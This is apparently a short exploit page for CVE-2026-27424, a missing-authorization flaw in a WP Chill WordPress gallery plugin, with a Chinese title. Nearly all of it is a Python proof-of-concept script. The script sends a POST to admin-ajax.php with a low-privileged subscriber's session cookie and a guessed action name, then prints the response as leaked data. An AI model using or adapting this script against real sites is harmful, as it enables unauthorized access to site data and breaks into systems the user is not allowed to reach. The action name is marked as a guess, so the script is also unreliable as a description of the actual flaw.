CVE-2026-27424: WP Chill插件权限缺失漏洞

import requests # Target URL of the vulnerable WordPress site target_url = "http://example.com/wp-admin/admin-ajax.php" # Vulnerable payload parameters payload = { "action": "final_tiles_gallery_ajax_action", # Replace with actual action name if known "gallery_id": "1" } # Cookies for a low-privileged user (e.g., Subscriber) cookies = { "wordpress_logged_in_12345": "low_priv_user_session_token" } try: # Send POST request to exploit missing authorization response = requests.post(target_url, data=payload, cookies=cookies, timeout=10) if response.status_code == 200: print("[+] Request successful. Data leaked:") print(response.text) else: print("[-] Exploit failed or endpoint not found.") except Exception as e: print(f"[!] Error: {e}")